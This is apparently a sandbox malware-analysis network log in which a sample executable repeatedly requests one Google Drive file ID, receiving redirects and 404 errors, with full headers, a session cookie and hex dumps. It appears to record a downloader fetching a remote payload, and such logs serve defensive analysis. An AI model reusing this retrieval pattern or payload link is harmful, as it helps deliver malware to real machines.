2024-12-03 16:25:28 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:25:29 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:25:29 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-OL1--5BaKnVjYlJAzZJb9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 X-GUploader-UploadID: AFiumC4VhU31ORDUXpE0CLbuQ5mCrmXeCnJ8qgNojShjeVZr7Zh26PcVor7TPkpz_S9BsmTiZ-W4al45TQ Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:25:29 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 73 2d 43 74 4d 73 6c 71 67 72 77 37 53 34 35 74 54 52 4d 76 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Hs-CtMslqgrw7S45tTRMvw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49955	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:25:31 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:25:32 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:25:31 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-mPGk2PjS9lxyRnjVzIldGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49956	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:25:34 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:25:35 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:25:34 GMT Content-Security-Policy: script-src 'nonce-P5H0aHfPGSlumNyI8nhDiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 X-GUploader-UploadID: AFiumC7I6SN12om3jzpykNrFOKJOawTPTvqtdMuyFBuTNvGA6oPEmOvYJ6uMR4dGOlfFAmmmeAVpE4IPLA Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:25:35 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 6b 79 6d 7a 6d 31 49 4b 59 41 55 62 48 68 50 71 79 35 53 52 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Akymzm1IKYAUbHhPqy5SRw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49957	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:25:37 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:25:37 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:25:37 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-9y8UN44MH9u5gAPuHn5xdw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49958	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:25:39 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:25:40 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:25:40 GMT Content-Security-Policy: script-src 'nonce-p8EvI-82T8v5BjV7A92iNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 X-GUploader-UploadID: AFiumC5beLnL5QzQF8Ycy0R-t3P2FjfFgFniNT9o55-3xIOD0Q7Z9skv201rLe9F1hF3wT0PorXc6kUIcg Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:25:40 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 36 79 75 46 51 43 6d 77 58 74 53 68 74 37 4e 64 49 62 54 55 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="A6yuFQCmwXtSht7NdIbTUQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49959	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:25:42 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:25:43 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:25:43 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-ikjzFsLpFC-OLb9dzqOi5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49960	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:25:45 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:25:46 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:25:45 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-h6UIz2VSNNV4WndnJiCAmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 X-GUploader-UploadID: AFiumC7rP1NHeXdQVUdi8CB0M2dXZ1NDnrOiy9uX11jSHRvd7us6dJzRfNVd376ScjnNpczzLvYLodsyIg Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:25:46 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 75 4c 47 50 65 79 69 38 79 52 64 6e 30 49 69 39 46 67 32 49 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GuLGPeyi8yRdn0Ii9Fg2Ig">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49961	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:25:48 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:25:49 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:25:48 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-j8rBOA2dPyAbpexFYNkwDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49962	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
